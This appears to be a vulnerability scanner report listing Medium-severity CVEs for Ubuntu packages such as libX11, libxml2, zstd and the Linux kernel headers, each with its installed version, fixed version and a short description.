Medium CVE-2018-14598 libx11-data 2:1.6.4-3 2:1.6.4-3ubuntu0.1 libX11: Crash on invalid reply in XListExtensions in ListExt.c libx11-data:2:1.6.4-3
Medium CVE-2018-14599 libx11-data 2:1.6.4-3 2:1.6.4-3ubuntu0.1 libX11: Off-by-one error in XListExtensions in ListExt.c libx11-data:2:1.6.4-3
Medium CVE-2018-14600 libx11-data 2:1.6.4-3 2:1.6.4-3ubuntu0.1 libX11: Out of Bounds write in XListExtensions in ListExt.c libx11-data:2:1.6.4-3
Medium CVE-2020-14344 libx11-data 2:1.6.4-3 2:1.6.4-3ubuntu0.3 libX11: Heap overflow in the X input method client libx11-data:2:1.6.4-3
Medium CVE-2020-14363 libx11-data 2:1.6.4-3 2:1.6.4-3ubuntu0.3 libX11: integer overflow leads to double free in locale handling libx11-data:2:1.6.4-3
Medium CVE-2021-31535 libx11-data 2:1.6.4-3 2:1.6.4-3ubuntu0.4 libX11: missing request length checks libx11-data:2:1.6.4-3
Medium CVE-2018-14404 libxml2 2.9.4+dfsg1-6.1ubuntu1 2.9.4+dfsg1-6.1ubuntu1.2 libxml2: NULL pointer dereference in xmlXPathCompOpEval() function in xpath.c libxml2:2.9.4+dfsg1-6.1ubuntu1
Medium CVE-2018-14567 libxml2 2.9.4+dfsg1-6.1ubuntu1 2.9.4+dfsg1-6.1ubuntu1.2 libxml2: Infinite loop caused by incorrect error detection during LZMA decompression libxml2:2.9.4+dfsg1-6.1ubuntu1
Medium CVE-2021-3516 libxml2 2.9.4+dfsg1-6.1ubuntu1 2.9.4+dfsg1-6.1ubuntu1.4 libxml2: Use-after-free in xmlEncodeEntitiesInternal() in entities.c libxml2:2.9.4+dfsg1-6.1ubuntu1
Medium CVE-2021-3517 libxml2 2.9.4+dfsg1-6.1ubuntu1 2.9.4+dfsg1-6.1ubuntu1.4 libxml2: Heap-based buffer overflow in xmlEncodeEntitiesInternal() in entities.c libxml2:2.9.4+dfsg1-6.1ubuntu1
Medium CVE-2021-3518 libxml2 2.9.4+dfsg1-6.1ubuntu1 2.9.4+dfsg1-6.1ubuntu1.4 libxml2: Use-after-free in xmlXIncludeDoProcess() in xinclude.c libxml2:2.9.4+dfsg1-6.1ubuntu1
Medium CVE-2021-3537 libxml2 2.9.4+dfsg1-6.1ubuntu1 2.9.4+dfsg1-6.1ubuntu1.4 libxml2: NULL pointer dereference when post-validating mixed content parsed in recovery mode libxml2:2.9.4+dfsg1-6.1ubuntu1
Medium CVE-2022-23308 libxml2 2.9.4+dfsg1-6.1ubuntu1 2.9.4+dfsg1-6.1ubuntu1.5 libxml2: Use-after-free of ID and IDREF attributes libxml2:2.9.4+dfsg1-6.1ubuntu1
Medium CVE-2022-29824 libxml2 2.9.4+dfsg1-6.1ubuntu1 2.9.4+dfsg1-6.1ubuntu1.6 libxml2: integer overflows in xmlBuf and xmlBuffer lead to out-of-bounds write libxml2:2.9.4+dfsg1-6.1ubuntu1
Medium CVE-2019-11922 libzstd1 1.3.3+dfsg-2ubuntu1 1.3.3+dfsg-2ubuntu1.1 A race condition in the one-pass compression functions of Zstandard pr ... libzstd1:1.3.3+dfsg-2ubuntu1
Medium CVE-2021-24031 libzstd1 1.3.3+dfsg-2ubuntu1 1.3.3+dfsg-2ubuntu1.2 zstd: adds read permissions to files while being compressed or uncompressed libzstd1:1.3.3+dfsg-2ubuntu1
Medium CVE-2021-24032 libzstd1 1.3.3+dfsg-2ubuntu1 1.3.3+dfsg-2ubuntu1.2 zstd: Race condition allows attacker to access world-readable destination file libzstd1:1.3.3+dfsg-2ubuntu1
Medium CVE-2017-13168 linux-libc-dev 4.15.0-24.26 4.15.0-39.42 kernel: scsi: sg driver can improperly access userspace memory linux-libc-dev:4.15.0-24.26
Medium CVE-2018-1000200 linux-libc-dev 4.15.0-24.26 4.15.0-33.36 kernel: NULL pointer dereference on OOM kill of large mlocked process linux-libc-dev:4.15.0-24.26
Medium CVE-2018-10853 linux-libc-dev 4.15.0-24.26 4.15.0-36.39 kernel: kvm: guest userspace to guest kernel write linux-libc-dev:4.15.0-24.26
Medium CVE-2018-10902 linux-libc-dev 4.15.0-24.26 4.15.0-43.46 kernel: MIDI driver race condition leads to a double-free linux-libc-dev:4.15.0-24.26
Medium CVE-2018-1093 linux-libc-dev 4.15.0-24.26 4.15.0-33.36 kernel: Out of bounds read in ext4/balloc.c:ext4_valid_block_bitmap() causes crash with crafted ext4 image linux-libc-dev:4.15.0-24.26
Medium CVE-2018-1108 linux-libc-dev 4.15.0-24.26 4.15.0-33.36 kernel: drivers: getrandom(2) unblocks too early after system boot linux-libc-dev:4.15.0-24.26
Medium CVE-2018-1120 linux-libc-dev 4.15.0-24.26 4.15.0-33.36 kernel: fuse-backed file mmap-ed onto process cmdline arguments causes denial of service linux-libc-dev:4.15.0-24.26
Medium CVE-2018-11412 linux-libc-dev 4.15.0-24.26 4.15.0-33.36 kernel: out-of-bounds memcpy in fs/ext4/inline.c:ext4_read_inline_data() with crafted ext4 image linux-libc-dev:4.15.0-24.26
Medium CVE-2018-11506 linux-libc-dev 4.15.0-24.26 4.15.0-33.36 kernel: Stack-based buffer overflow in drivers/scsi/sr_ioctl.c allows denial of service or other unspecified impact linux-libc-dev:4.15.0-24.26
Medium CVE-2018-12232 linux-libc-dev 4.15.0-24.26 4.15.0-33.36 kernel: NULL pointer dereference if close and fchownat system calls share a socket file descriptor linux-libc-dev:4.15.0-24.26
Medium CVE-2018-12233 linux-libc-dev 4.15.0-24.26 4.15.0-33.36 kernel: Memory corruption in JFS setattr linux-libc-dev:4.15.0-24.26
Medium CVE-2018-13405 linux-libc-dev 4.15.0-24.26 4.15.0-33.36 kernel: Missing check in fs/inode.c:inode_init_owner() does not clear SGID bit on non-directories for non-members linux-libc-dev:4.15.0-24.26
Medium CVE-2018-13406 linux-libc-dev 4.15.0-24.26 4.15.0-33.36 kernel: Integer overflow in drivers/video/fbdev/uvesafb.c:uvesafb_setcmap() allows for potential denial of service linux-libc-dev:4.15.0-24.26
Medium CVE-2018-14625 linux-libc-dev 4.15.0-24.26 4.15.0-44.47 kernel: use-after-free Read in vhost_transport_send_pkt linux-libc-dev:4.15.0-24.26
Medium CVE-2018-14633 linux-libc-dev 4.15.0-24.26 4.15.0-36.39 kernel: stack-based buffer overflow in chap_server_compute_md5() in iscsi target linux-libc-dev:4.15.0-24.26
Medium CVE-2018-14678 linux-libc-dev 4.15.0-24.26 4.15.0-47.50 xen: Uninitialized state in x86 PV failsafe callback path (XSA-274) linux-libc-dev:4.15.0-24.26
Medium CVE-2018-14734 linux-libc-dev 4.15.0-24.26 4.15.0-43.46 kernel: use-after-free in ucma_leave_multicast in drivers/infiniband/core/ucma.c linux-libc-dev:4.15.0-24.26
Medium CVE-2018-16276 linux-libc-dev 4.15.0-24.26 4.15.0-43.46 kernel: incorrect bounds checking in yurex_read in drivers/usb/misc/yurex.c linux-libc-dev:4.15.0-24.26
Medium CVE-2018-16658 linux-libc-dev 4.15.0-24.26 4.15.0-39.42 kernel: Information leak in cdrom_ioctl_drive_status linux-libc-dev:4.15.0-24.26
Medium CVE-2018-16871 linux-libc-dev 4.15.0-24.26 4.15.0-46.49 kernel: nfs: NULL pointer dereference due to an anomalized NFS message sequence linux-libc-dev:4.15.0-24.26
Medium CVE-2018-16882 linux-libc-dev 4.15.0-24.26 4.15.0-44.47 Kernel: KVM: nVMX: use after free in posted interrupt processing linux-libc-dev:4.15.0-24.26
Medium CVE-2018-16884 linux-libc-dev 4.15.0-24.26 4.15.0-50.54 kernel: nfs: use-after-free in svc_process_common() linux-libc-dev:4.15.0-24.26
Medium CVE-2018-17972 linux-libc-dev 4.15.0-24.26 4.15.0-44.47 kernel: Unprivileged users able to inspect kernel stacks of arbitrary tasks linux-libc-dev:4.15.0-24.26
Medium CVE-2018-18021 linux-libc-dev 4.15.0-24.26 4.15.0-47.50 kernel: Privilege escalation on arm64 via KVM hypervisor linux-libc-dev:4.15.0-24.26
Medium CVE-2018-18281 linux-libc-dev 4.15.0-24.26 4.15.0-44.47 kernel: TLB flush happens too late on mremap linux-libc-dev:4.15.0-24.26
Medium CVE-2018-18397 linux-libc-dev 4.15.0-24.26 4.15.0-46.49 kernel: userfaultfd bypasses tmpfs file permissions linux-libc-dev:4.15.0-24.26
Medium CVE-2018-18445 linux-libc-dev 4.15.0-24.26 4.15.0-43.46 kernel: Faulty computation of numeric bounds in the BPF verifier linux-libc-dev:4.15.0-24.26
Medium CVE-2018-18690 linux-libc-dev 4.15.0-24.26 4.15.0-43.46 kernel: filesystem corruption due to an unchecked error condition during an xfs attribute change linux-libc-dev:4.15.0-24.26
Medium CVE-2018-18710 linux-libc-dev 4.15.0-24.26 4.15.0-43.46 kernel: Information leak in cdrom_ioctl_select_disc in drivers/cdrom/cdrom.c linux-libc-dev:4.15.0-24.26
Medium CVE-2018-18955 linux-libc-dev 4.15.0-24.26 4.15.0-42.45 kernel: Privilege escalation in map_write() in kernel/user_namespace.c linux-libc-dev:4.15.0-24.26
Medium CVE-2018-19407 linux-libc-dev 4.15.0-24.26 4.15.0-44.47 kernel: kvm: NULL pointer dereference in vcpu_scan_ioapic in arch/x86/kvm/x86.c linux-libc-dev:4.15.0-24.26
Medium CVE-2018-19854 linux-libc-dev 4.15.0-24.26 4.15.0-46.49 kernel: Information Disclosure in crypto_report_one in crypto/crypto_user.c linux-libc-dev:4.15.0-24.26
Medium CVE-2018-20784 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 kernel: infinite loop in update_blocked_averages() in kernel/sched/fair.c leading to denial of service linux-libc-dev:4.15.0-24.26
Medium CVE-2018-20856 linux-libc-dev 4.15.0-24.26 4.15.0-58.64 kernel: Use-after-free in __blk_drain_queue() function in block/blk-core.c linux-libc-dev:4.15.0-24.26
Medium CVE-2018-20976 linux-libc-dev 4.15.0-24.26 4.15.0-65.74 kernel: use-after-free in fs/xfs/xfs_super.c linux-libc-dev:4.15.0-24.26
Medium CVE-2018-21008 linux-libc-dev 4.15.0-24.26 4.15.0-66.75 kernel: use-after-free can be caused by the function rsi_mac80211_detach in the file drivers/net/wireless/rsi/rsi_91x_mac80211.c linux-libc-dev:4.15.0-24.26
Medium CVE-2018-25020 linux-libc-dev 4.15.0-24.26 4.15.0-166.174 kernel: long jump over an instruction sequence can lead to overflow in the BPF subsystem linux-libc-dev:4.15.0-24.26
Medium CVE-2018-5383 linux-libc-dev 4.15.0-24.26 4.15.0-58.64 kernel: Bluetooth implementations may not sufficiently validate elliptic curve parameters during Diffie-Hellman key exchange linux-libc-dev:4.15.0-24.26
Medium CVE-2018-5814 linux-libc-dev 4.15.0-24.26 4.15.0-33.36 kernel: Race condition errors in USB over IP functionality can cause denial of service linux-libc-dev:4.15.0-24.26
Medium CVE-2018-6555 linux-libc-dev 4.15.0-24.26 4.15.0-36.39 kernel: irda: use-after-free vulnerability in the hashbin list linux-libc-dev:4.15.0-24.26
Medium CVE-2018-9363 linux-libc-dev 4.15.0-24.26 4.15.0-39.42 kernel: Buffer overflow in hidp_process_report linux-libc-dev:4.15.0-24.26
Medium CVE-2018-9415 linux-libc-dev 4.15.0-24.26 4.15.0-33.36 kernel: race condition in the ARM Advanced Microcontroller Bus Architecture (AMBA) driver linux-libc-dev:4.15.0-24.26
Medium CVE-2018-9518 linux-libc-dev 4.15.0-24.26 4.15.0-34.37 kernel: NFC: llcp: Out of bounds write in nfc_llcp_sdp_tlv struct in nfc/llcp_commands.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-0136 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 kernel: insufficient access control in the Intel(R) PROSet/Wireless WiFi Software driver may allow an unauthenticated user to potentially enable DoS via adjacent access linux-libc-dev:4.15.0-24.26
Medium CVE-2019-0145 linux-libc-dev 4.15.0-24.26 4.15.0-118.119 Buffer overflow in i40e driver for Intel(R) Ethernet 700 Series Contro ... linux-libc-dev:4.15.0-24.26
Medium CVE-2019-0147 linux-libc-dev 4.15.0-24.26 4.15.0-118.119 Insufficient input validation in i40e driver for Intel(R) Ethernet 700 ... linux-libc-dev:4.15.0-24.26
Medium CVE-2019-0148 linux-libc-dev 4.15.0-24.26 4.15.0-118.119 Resource leak in i40e driver for Intel(R) Ethernet 700 Series Controll ... linux-libc-dev:4.15.0-24.26
Medium CVE-2019-0154 linux-libc-dev 4.15.0-24.26 4.15.0-69.78 hw: Intel GPU Denial Of Service while accessing MMIO in lower power state linux-libc-dev:4.15.0-24.26
Medium CVE-2019-10126 linux-libc-dev 4.15.0-24.26 4.15.0-58.64 kernel: Heap overflow in mwifiex_uap_parse_tail_ies function in drivers/net/wireless/marvell/mwifiex/ie.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-10207 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 kernel: null-pointer dereference in hci_uart_set_flow_control linux-libc-dev:4.15.0-24.26
Medium CVE-2019-10220 linux-libc-dev 4.15.0-24.26 4.15.0-88.88 kernel: CIFS: Relative paths injection in directory entry lists linux-libc-dev:4.15.0-24.26
Medium CVE-2019-10638 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 Kernel: net: weak IP ID generation leads to remote device tracking linux-libc-dev:4.15.0-24.26
Medium CVE-2019-10639 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 Kernel: net: using kernel space address bits to derive IP ID may potentially break KASLR linux-libc-dev:4.15.0-24.26
Medium CVE-2019-11085 linux-libc-dev 4.15.0-24.26 4.15.0-55.60 kernel: insufficient input validation in kernel mode driver in Intel i915 graphics leads to privilege escalation linux-libc-dev:4.15.0-24.26
Medium CVE-2019-11091 linux-libc-dev 4.15.0-24.26 4.15.0-50.54 hardware: Microarchitectural Data Sampling Uncacheable Memory (MDSUM) linux-libc-dev:4.15.0-24.26
Medium CVE-2019-1125 linux-libc-dev 4.15.0-24.26 4.15.0-58.64 kernel: hw: Spectre SWAPGS gadget vulnerability linux-libc-dev:4.15.0-24.26
Medium CVE-2019-11479 linux-libc-dev 4.15.0-24.26 4.15.0-54.58 kernel: tcp: excessive resource consumption for TCP connections with low MSS allows remote denial of service linux-libc-dev:4.15.0-24.26
Medium CVE-2019-11599 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 kernel: fix race condition between mmget_not_zero()/get_task_mm() and core dumping linux-libc-dev:4.15.0-24.26
Medium CVE-2019-11815 linux-libc-dev 4.15.0-24.26 4.15.0-55.60 kernel: race condition in rds_tcp_kill_sock in net/rds/tcp.c leading to use-after-free linux-libc-dev:4.15.0-24.26
Medium CVE-2019-11833 linux-libc-dev 4.15.0-24.26 4.15.0-55.60 kernel: fs/ext4/extents.c leads to information disclosure linux-libc-dev:4.15.0-24.26
Medium CVE-2019-11884 linux-libc-dev 4.15.0-24.26 4.15.0-55.60 kernel: sensitive information disclosure from kernel stack memory via HIDPCONNADD command linux-libc-dev:4.15.0-24.26
Medium CVE-2019-12818 linux-libc-dev 4.15.0-24.26 4.15.0-58.64 kernel: null-pointer dereference in function nfc_llcp_build_tlv in net/nfc/llcp_commands.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-12819 linux-libc-dev 4.15.0-24.26 4.15.0-58.64 kernel: use-after-free in function __mdiobus_register() in drivers/net/phy/mdio_bus.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-12881 linux-libc-dev 4.15.0-24.26 4.15.0-58.64 kernel: NULL pointer dereference in i915_gem_userptr_get_pages allows local denial of service via crafted ioctl calls linux-libc-dev:4.15.0-24.26
Medium CVE-2019-12984 linux-libc-dev 4.15.0-24.26 4.15.0-58.64 kernel: null pointer dereference in function nfc_genl_deactivate_target() in net/nfc/netlink.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-13233 linux-libc-dev 4.15.0-24.26 4.15.0-58.64 kernel: use-after-free in arch/x86/lib/insn-eval.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-13272 linux-libc-dev 4.15.0-24.26 4.15.0-58.64 kernel: broken permission and object lifetime handling for PTRACE_TRACEME linux-libc-dev:4.15.0-24.26
Medium CVE-2019-13648 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 kernel: denial of service in arch/powerpc/kernel/signal_32.c and arch/powerpc/kernel/signal_64.c via sigreturn() system call linux-libc-dev:4.15.0-24.26
Medium CVE-2019-14283 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 kernel: integer overflow and OOB read in drivers/block/floppy.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-14284 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 kernel: denial of service in drivers/block/floppy.c by setup_format_params division-by-zero linux-libc-dev:4.15.0-24.26
Medium CVE-2019-14615 linux-libc-dev 4.15.0-24.26 4.15.0-76.86 kernel: Intel graphics card information leak. linux-libc-dev:4.15.0-24.26
Medium CVE-2019-14814 linux-libc-dev 4.15.0-24.26 4.15.0-66.75 kernel: heap overflow in mwifiex_set_uap_rates() function of Marvell Wifi Driver leading to DoS linux-libc-dev:4.15.0-24.26
Medium CVE-2019-14815 linux-libc-dev 4.15.0-24.26 4.15.0-66.75 kernel: heap-overflow in mwifiex_set_wmm_params() function of Marvell WiFi driver leading to DoS linux-libc-dev:4.15.0-24.26
Medium CVE-2019-14816 linux-libc-dev 4.15.0-24.26 4.15.0-66.75 kernel: heap overflow in mwifiex_update_vs_ie() function of Marvell WiFi driver linux-libc-dev:4.15.0-24.26
Medium CVE-2019-14821 linux-libc-dev 4.15.0-24.26 4.15.0-66.75 Kernel: KVM: OOB memory access via mmio ring buffer linux-libc-dev:4.15.0-24.26
Medium CVE-2019-14895 linux-libc-dev 4.15.0-24.26 4.15.0-74.84 kernel: heap-based buffer overflow in mwifiex_process_country_ie() function in drivers/net/wireless/marvell/mwifiex/sta_ioctl.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-14896 linux-libc-dev 4.15.0-24.26 4.15.0-74.84 kernel: heap-based buffer overflow in lbs_ibss_join_existing function in drivers/net/wireless/marvell/libertas/cfg.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-14897 linux-libc-dev 4.15.0-24.26 4.15.0-74.84 kernel: stack-based buffer overflow in add_ie_rates function in drivers/net/wireless/marvell/libertas/cfg.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-14901 linux-libc-dev 4.15.0-24.26 4.15.0-74.84 kernel: heap overflow in marvell/mwifiex/tdls.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15030 linux-libc-dev 4.15.0-24.26 4.15.0-64.73 kernel: powerpc: local user can read vector registers of other users' processes via a Facility Unavailable exception linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15031 linux-libc-dev 4.15.0-24.26 4.15.0-64.73 kernel: powerpc: local user can read vector registers of other users' processes via an interrupt linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15090 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 kernel: An out-of-bounds read in drivers/scsi/qedi/qedi_dbg.c leading to crash or information disclosure linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15098 linux-libc-dev 4.15.0-24.26 4.15.0-69.78 kernel: a NULL pointer dereference in drivers/net/wireless/ath/ath6kl/usb.c leads to a crash linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15099 linux-libc-dev 4.15.0-24.26 4.15.0-88.88 kernel: a NULL pointer dereference in drivers/net/wireless/ath/ath10k/usb.c leads to a crash linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15117 linux-libc-dev 4.15.0-24.26 4.15.0-66.75 kernel: out of bounds memory access in parse_audio_mixer_unit in sound/usb/mixer.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15118 linux-libc-dev 4.15.0-24.26 4.15.0-66.75 kernel: mishandling recursion in sound/usb/mixer.c leading to kernel stack exhaustion and crash linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15666 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 kernel: out-of-bounds array access in __xfrm_policy_unlink linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15807 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 kernel: Memory leak in drivers/scsi/libsas/sas_expander.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15902 linux-libc-dev 4.15.0-24.26 4.15.0-66.75 kernel: backporting error in ptrace_get_debugreg() linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15916 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 kernel: memory leak in register_queue_kobjects() in net/core/net-sysfs.c leads to denial of service linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15917 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 kernel: use-after-free in drivers/bluetooth/hci_ldisc.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15918 linux-libc-dev 4.15.0-24.26 4.15.0-66.75 kernel: out-of-bounds read in fs/cifs/smb2pdu.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15921 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 kernel: memory leak in genl_register_family() in net/netlink/genetlink.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15924 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 kernel: null pointer dereference in drivers/net/ethernet/intel/fm10k/fm10k_main.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15926 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 kernel: out of bounds access in functions ath6kl_wmi_pstream_timeout_event_rx and ath6kl_wmi_cac_event_rx linux-libc-dev:4.15.0-24.26
Medium CVE-2019-15927 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 kernel: out-of-bounds in function build_audio_procunit in sound/usb/mixer.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-16413 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 kernel: i_size_read() infinite loop leads to denial of service linux-libc-dev:4.15.0-24.26
Medium CVE-2019-16746 linux-libc-dev 4.15.0-24.26 4.15.0-72.81 kernel: buffer-overflow hardening in WiFi beacon validation code. linux-libc-dev:4.15.0-24.26
Medium CVE-2019-16994 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 kernel: Memory leak in sit_init_net() in net/ipv6/sit.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-17052 linux-libc-dev 4.15.0-24.26 4.15.0-69.78 kernel: unprivileged users able to create RAW sockets in the AF_AX25 network protocol. linux-libc-dev:4.15.0-24.26
Medium CVE-2019-17053 linux-libc-dev 4.15.0-24.26 4.15.0-69.78 kernel: unprivileged users able to create RAW sockets in AF_IEEE802154 network protocol linux-libc-dev:4.15.0-24.26
Medium CVE-2019-17054 linux-libc-dev 4.15.0-24.26 4.15.0-69.78 kernel: privilege escalation in atalk_create in net/appletalk/ddp.c in the AF_APPLETALK network module linux-libc-dev:4.15.0-24.26
Medium CVE-2019-17055 linux-libc-dev 4.15.0-24.26 4.15.0-69.78 kernel: unprivileged users able to create RAW sockets in AF_ISDN network protocol linux-libc-dev:4.15.0-24.26
Medium CVE-2019-17056 linux-libc-dev 4.15.0-24.26 4.15.0-69.78 kernel: unprivileged access to llcp_sock_create in net/nfc/llcp_sock.c in the AF_NFC socket type. linux-libc-dev:4.15.0-24.26
Medium CVE-2019-17133 linux-libc-dev 4.15.0-24.26 4.15.0-72.81 kernel: buffer overflow in cfg80211_mgd_wext_giwessid in net/wireless/wext-sme.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-17666 linux-libc-dev 4.15.0-24.26 4.15.0-69.78 kernel: rtl_p2p_noa_ie in drivers/net/wireless/realtek/rtlwifi/ps.c in the Linux kernel lacks a certain upper-bound check, leading to a buffer overflow linux-libc-dev:4.15.0-24.26
Medium CVE-2019-18282 linux-libc-dev 4.15.0-24.26 4.15.0-74.84 kernel: The flow_dissector feature allows device tracking linux-libc-dev:4.15.0-24.26
Medium CVE-2019-18660 linux-libc-dev 4.15.0-24.26 4.15.0-74.84 kernel: powerpc: incomplete Spectre-RSB mitigation leads to information exposure linux-libc-dev:4.15.0-24.26
Medium CVE-2019-18675 linux-libc-dev 4.15.0-24.26 4.15.0-36.39 kernel: integer overflow in cpia2_remap_buffer in drivers/media/usb/cpia2/cpia2_core.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-19062 linux-libc-dev 4.15.0-24.26 4.15.0-88.88 kernel: memory leak in the crypto_report() function in crypto/crypto_user_base.c allows for DoS linux-libc-dev:4.15.0-24.26
Medium CVE-2019-19332 linux-libc-dev 4.15.0-24.26 4.15.0-88.88 Kernel: kvm: OOB memory write via kvm_dev_ioctl_get_cpuid linux-libc-dev:4.15.0-24.26
Medium CVE-2019-19462 linux-libc-dev 4.15.0-24.26 4.15.0-109.110 kernel: NULL pointer dereference in relay_open in kernel/relay.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-19768 linux-libc-dev 4.15.0-24.26 4.15.0-99.100 kernel: use-after-free in __blk_add_trace in kernel/trace/blktrace.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-19807 linux-libc-dev 4.15.0-24.26 4.15.0-74.84 kernel: use-after-free in sound/core/timer.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-19922 linux-libc-dev 4.15.0-24.26 4.15.0-69.78 kernel: when cpu.cfs_quota_us is used allows attackers to cause a denial of service against non-cpu-bound applications linux-libc-dev:4.15.0-24.26
Medium CVE-2019-19927 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 kernel: Out-of-bounds read in ttm_put_pages in gpu/drm/ttm/ttm_page_alloc.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-19965 linux-libc-dev 4.15.0-24.26 4.15.0-88.88 kernel: NULL pointer dereference in drivers/scsi/libsas/sas_discover.c because of mishandling of port disconnection during discovery linux-libc-dev:4.15.0-24.26
Medium CVE-2019-20054 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 kernel: Null pointer dereference in drop_sysctl_table() in fs/proc/proc_sysctl.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-20095 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 kernel: memory leak in mwifiex_tm_cmd in drivers/net/wireless/marvell/mwifiex/cfg80211.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-20096 linux-libc-dev 4.15.0-24.26 4.15.0-88.88 kernel: memory leak in __feat_register_sp() in net/dccp/feat.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-20636 linux-libc-dev 4.15.0-24.26 4.15.0-91.92 kernel: out-of-bounds write via crafted keycode table linux-libc-dev:4.15.0-24.26
Medium CVE-2019-20812 linux-libc-dev 4.15.0-24.26 4.15.0-88.88 kernel: af_packet: TPACKET_V3: invalid timer timeout on error linux-libc-dev:4.15.0-24.26
Medium CVE-2019-20908 linux-libc-dev 4.15.0-24.26 4.15.0-112.113 kernel: lockdown: bypass through ACPI write via efivar_ssdt linux-libc-dev:4.15.0-24.26
Medium CVE-2019-20934 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 kernel: use-after-free in show_numa_stats function linux-libc-dev:4.15.0-24.26
Medium CVE-2019-2101 linux-libc-dev 4.15.0-24.26 4.15.0-58.64 In uvc_parse_standard_control of uvc_driver.c, there is a possible out ... linux-libc-dev:4.15.0-24.26
Medium CVE-2019-2182 linux-libc-dev 4.15.0-24.26 4.15.0-91.92 kernel: possible execution path in MMU code leads to local escalation of privilege linux-libc-dev:4.15.0-24.26
Medium CVE-2019-2213 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 In binder_free_transaction of binder.c, there is a possible use-after- ... linux-libc-dev:4.15.0-24.26
Medium CVE-2019-25045 linux-libc-dev 4.15.0-24.26 4.15.0-66.75 kernel: use-after-free in the XFRM subsystem related to an xfrm_state_fini() panic linux-libc-dev:4.15.0-24.26
Medium CVE-2019-3459 linux-libc-dev 4.15.0-24.26 4.15.0-47.50 kernel: Heap address information leak while using L2CAP_GET_CONF_OPT linux-libc-dev:4.15.0-24.26
Medium CVE-2019-3460 linux-libc-dev 4.15.0-24.26 4.15.0-47.50 kernel: Heap address information leak while using L2CAP_PARSE_CONF_RSP linux-libc-dev:4.15.0-24.26
Medium CVE-2019-3846 linux-libc-dev 4.15.0-24.26 4.15.0-58.64 kernel: Heap overflow in mwifiex_update_bss_desc_with_ie function in marvell/mwifiex/scan.c linux-libc-dev:4.15.0-24.26
Medium CVE-2019-3874 linux-libc-dev 4.15.0-24.26 4.15.0-50.54 kernel: SCTP socket buffer memory leak leading to denial of service linux-libc-dev:4.15.0-24.26
Medium CVE-2019-3900 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 Kernel: vhost_net: infinite loop while receiving packets leads to DoS linux-libc-dev:4.15.0-24.26
Medium CVE-2019-5108 linux-libc-dev 4.15.0-24.26 4.15.0-88.88 kernel: triggering AP to send IAPP location updates for stations before the required authentication process has completed can lead to DoS linux-libc-dev:4.15.0-24.26
Medium CVE-2019-5489 linux-libc-dev 4.15.0-24.26 4.15.0-60.67 Kernel: page cache side channel attacks linux-libc-dev:4.15.0-24.26
Medium CVE-2019-6133 linux-libc-dev 4.15.0-24.26 4.15.0-46.49 polkit: Temporary auth hijacking via PID reuse and non-atomic fork linux-libc-dev:4.15.0-24.26
Medium CVE-2019-6974 linux-libc-dev 4.15.0-24.26 4.15.0-47.50 Kernel: KVM: potential use-after-free via kvm_ioctl_create_device() linux-libc-dev:4.15.0-24.26
Medium CVE-2019-7221 linux-libc-dev 4.15.0-24.26 4.15.0-47.50 Kernel: KVM: nVMX: use-after-free of the hrtimer for emulation of the preemption timer linux-libc-dev:4.15.0-24.26
Medium CVE-2019-7222 linux-libc-dev 4.15.0-24.26 4.15.0-47.50 Kernel: KVM: leak of uninitialized stack contents to guest linux-libc-dev:4.15.0-24.26
